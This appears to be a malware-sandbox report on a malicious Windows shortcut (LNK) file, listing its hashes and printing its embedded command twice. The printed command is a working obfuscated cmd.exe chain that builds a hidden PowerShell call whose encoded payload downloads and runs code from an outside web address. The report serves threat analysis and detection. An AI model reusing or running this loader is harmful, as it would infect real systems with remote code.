Malicious
Malicious

fa628b4e8ede52829310f8806c37e5c2

LNK File
|
MD5: fa628b4e8ede52829310f8806c37e5c2
|
Size: 1.04 KB
|
application/x-ms-shortcut

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
fa628b4e8ede52829310f8806c37e5c2
Sha1
f6888f9c96b7d459f3b40d8cb96e5bd85aed727d
Sha256
d59a80e71d93bc9f90f32fdd1cce849eab5764c5ca379807382dea76a6753155
Sha384
1e7512514dfe263d1610a5cd6781f24a976756f9e34256ee6910f85a1d32cafb90bb54fb5b21b5f576b3a82a7db8346d
Sha512
915e6ff6739495b3fc03bbc76c7642dba5bd059a2d460a90937e16a3f380f12e504d0197982830a7d165de9250e36c5913ae2bcaf8f6eb97c1128fa3f0cdc887
SSDeep
24:8q3iejkj+8w5GpJQnDB31IdHuOTQ0OKh3rT06yIthfVRH9OMdei2e:8qyWkPpJyI5x797ci2e
TLSH
9A11259E16B884A2C1ED65730517F723F3BD2633E64C17952004B584CCE06645B2F874
File Structure
fa628b4e8ede52829310f8806c37e5c2
Malicious
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

cmd.exe /WMRX:F0E /WFXI:BNYE5S /D/C "for %R in ("SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AC") do for %Y in (ers) do for %N in (xe) do for %o in ("kALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAcABh") do for %T in (pow) do for %I in (-) do for %K in (w) do for %Q in (nc) do for %P in ("AG4AcwBpAHYAZQB1AHMAZQByAC4AYwBvAG0ALwBhAHAAaQAvAGkAdABiAGkALwBaAE4AdwBsAGsAcQ") do for %U in (-e) do for %m in (hell) do for %p in ("BBADcANwAyADkAUABNAEQARgBkADIAUwBoAHoAVQBaAGkAZwBoAE0AcgBRAHMATgBRAFEAJwApAA==") do for %l in (hid) do for %L in (.e) do %T%Y%m%L%N %I%K %l %U%Q %~R%~o%~P%~p"
fa628b4e8ede52829310f8806c37e5c2 (1.04 KB)
File Structure
fa628b4e8ede52829310f8806c37e5c2
Malicious
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

cmd.exe /WMRX:F0E /WFXI:BNYE5S /D/C "for %R in ("SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AC") do for %Y in (ers) do for %N in (xe) do for %o in ("kALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAcABh") do for %T in (pow) do for %I in (-) do for %K in (w) do for %Q in (nc) do for %P in ("AG4AcwBpAHYAZQB1AHMAZQByAC4AYwBvAG0ALwBhAHAAaQAvAGkAdABiAGkALwBaAE4AdwBsAGsAcQ") do for %U in (-e) do for %m in (hell) do for %p in ("BBADcANwAyADkAUABNAEQARgBkADIAUwBoAHoAVQBaAGkAZwBoAE0AcgBRAHMATgBRAFEAJwApAA==") do for %l in (hid) do for %L in (.e) do %T%Y%m%L%N %I%K %l %U%Q %~R%~o%~P%~p"

Malicious

fa628b4e8ede52829310f8806c37e5c2
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙